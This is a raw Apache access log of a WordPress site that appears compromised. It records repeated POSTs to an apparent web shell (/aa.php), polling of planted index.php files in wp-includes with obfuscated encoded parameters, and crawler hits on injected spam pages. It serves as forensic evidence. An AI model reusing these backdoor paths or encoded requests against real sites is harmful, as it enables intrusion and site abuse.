180.248.28.215 - - [27/Oct/2025:13:08:33 -0400] "POST /aa.php HTTP/1.1" 200 86027 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:03:36 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383231362p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343631362q3363366231376538353837323230633732666663303862393166643232396435222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:36 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:39 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:41 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:43 -0400] "POST /aa.php HTTP/1.1" 200 86036 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:08:44 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
180.248.28.215 - - [27/Oct/2025:13:08:46 -0400] "POST /aa.php HTTP/1.1" 200 86027 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:48 -0400] "POST /aa.php HTTP/1.1" 200 86019 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:51 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:53 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:55 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:03:57 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383233372p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343633372q6434643561623466363863333035393439303962393861333764333830353061222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:57 -0400] "POST /aa.php HTTP/1.1" 200 86032 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:08:59 -0400] "POST /aa.php HTTP/1.1" 200 86019 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:00 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:09:01 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/xmlrpc.php??market=60907219 HTTP/1.1" 200 24158 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:09:01 -0400] "POST /aa.php HTTP/1.1" 200 86019 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:03 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:05 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:05 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:06 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:09:05 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=59896706 HTTP/1.1" 200 19316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
180.248.28.215 - - [27/Oct/2025:13:09:06 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:06 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:06 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:07 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:08 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:10 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:13 -0400] "POST /aa.php HTTP/1.1" 200 86023 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:14 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:16 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:16 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:16 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:16 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:17 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:17 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:17 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:18 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:04:18 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383235382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343635382q3537373263303363303865333233303736336136353430333233346161636334222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:18 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:18 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:18 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:18 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:20 -0400] "POST /aa.php HTTP/1.1" 200 86027 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:21 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
204.12.208.18 - - [27/Oct/2025:13:09:22 -0400] "GET /wp-includes/qqee080c/index.php HTTP/1.1" 200 26 "http://emporiumlooks.com/wp-includes/qqee080c/index.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24"
180.248.28.215 - - [27/Oct/2025:13:09:22 -0400] "POST /aa.php HTTP/1.1" 200 86036 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:24 -0400] "POST /aa.php HTTP/1.1" 200 86036 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:25 -0400] "POST /aa.php HTTP/1.1" 200 86027 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:27 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:27 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:28 -0400] "POST /aa.php HTTP/1.1" 200 86019 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:30 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:30 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:30 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:31 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:31 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:31 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:31 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:32 -0400] "POST /aa.php HTTP/1.1" 200 86027 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:33 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:34 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:34 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:34 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:34 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:35 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:35 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:35 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:36 -0400] "POST /aa.php HTTP/1.1" 200 86023 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:04:38 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383237382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343637382q3461346232653334396332386436613238376161393031333338363035363937222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:37 -0400] "POST /aa.php HTTP/1.1" 200 86036 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:39 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:40 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:42 -0400] "POST /aa.php HTTP/1.1" 200 86023 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:44 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:45 -0400] "POST /aa.php HTTP/1.1" 200 86027 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:46 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:48 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:48 -0400] "POST /aa.php HTTP/1.1" 200 86020 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:49 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:51 -0400] "POST /aa.php HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:51 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:53 -0400] "POST /aa.php HTTP/1.1" 200 86028 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:55 -0400] "POST /aa.php HTTP/1.1" 200 86036 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:04:58 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383239382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343639382q6135303230306539366633383533373435633264363833666461336661356231222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
180.248.28.215 - - [27/Oct/2025:13:09:57 -0400] "POST /aa.php HTTP/1.1" 200 86019 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:10:15 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.54.126.113 - - [27/Oct/2025:13:05:19 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383331392p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343731392q6232643365643666393062336364346564313030323035363461323332633563222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:10:23 -0400] "GET /loud044000145.html HTTP/1.1" 200 24148 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:05:40 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383334302p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343734302q6461373861373137626339373165653637626565383263623834346231666466222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.160 - - [27/Oct/2025:13:10:46 -0400] "GET /upstairs147035754.html HTTP/1.1" 200 23601 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.168 - - [27/Oct/2025:13:10:46 -0400] "GET /products/275sk27571 HTTP/1.1" 200 23677 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.126.113 - - [27/Oct/2025:13:06:00 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383336302p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343736302q3362303666306631646239306138353464376535663733626436646161346531222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:06:21 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383338312p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343738312q6136623063373031333734396664313966386335346364323035323930646364222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:11:38 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/xmlrpc.php??market=67627118 HTTP/1.1" 200 24022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.126.113 - - [27/Oct/2025:13:06:42 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383430322p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343830322q3239373435336339376136333238393032653863663165323162373830623031222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:11:41 -0400] "GET /upstairs147035754.html HTTP/1.1" 200 23601 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [27/Oct/2025:13:11:43 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
180.102.134.69 - - [27/Oct/2025:13:11:55 -0400] "GET / HTTP/1.1" 200 5784 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.126.113 - - [27/Oct/2025:13:07:03 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383432332p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343832332q3165636234626464396631316538393534333236623730353531313637373632222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.160 - - [27/Oct/2025:13:12:21 -0400] "GET /care202034223.html HTTP/1.1" 200 19516 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:07:24 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383434342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343834342q6434646133393562643930336335326233353865643332616336303833653164222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:12:23 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=67903535 HTTP/1.1" 200 24325 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.168 - - [27/Oct/2025:13:12:28 -0400] "GET /category/1_394_470/1 HTTP/1.1" 200 23677 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.126.113 - - [27/Oct/2025:13:07:44 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383436342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343836342q6561373038386562656461323039616536646162383038643034366632383134222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:08:05 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383438352p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343838352q3938636465613363313066343361656264643439656335393834343337376664222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:13:14 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-activate.php??market=68729823 HTTP/1.1" 200 22397 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [27/Oct/2025:13:13:13 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.77.168 - - [27/Oct/2025:13:13:22 -0400] "GET /se-sake222-8878f06 HTTP/1.1" 200 23662 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:08:26 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383530362p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343930362q6534353463643439323238666334653766643265303038353963663936316438222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:13:39 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php?market=55286682 HTTP/1.1" 200 22571 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:08:47 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383532372p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343932372q3432343937646463643930613364306430393363613030323838376233316131222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:14:04 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/networks.php??market=60821271 HTTP/1.1" 200 23898 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:09:08 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383534382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343934382q3962393562313363343039356163326534666332623532313861346632313164222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:14:18 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=70827167 HTTP/1.1" 200 24195 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:09:29 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383536392p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343936392q6431323934336131326437353437633133353566333561663235313834663232222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:14:35 -0400] "GET /f/campaign/mailmagacp/?sc_i=cp_ft_b_mlcp_syoukai HTTP/1.1" 200 23951 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [27/Oct/2025:13:14:42 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
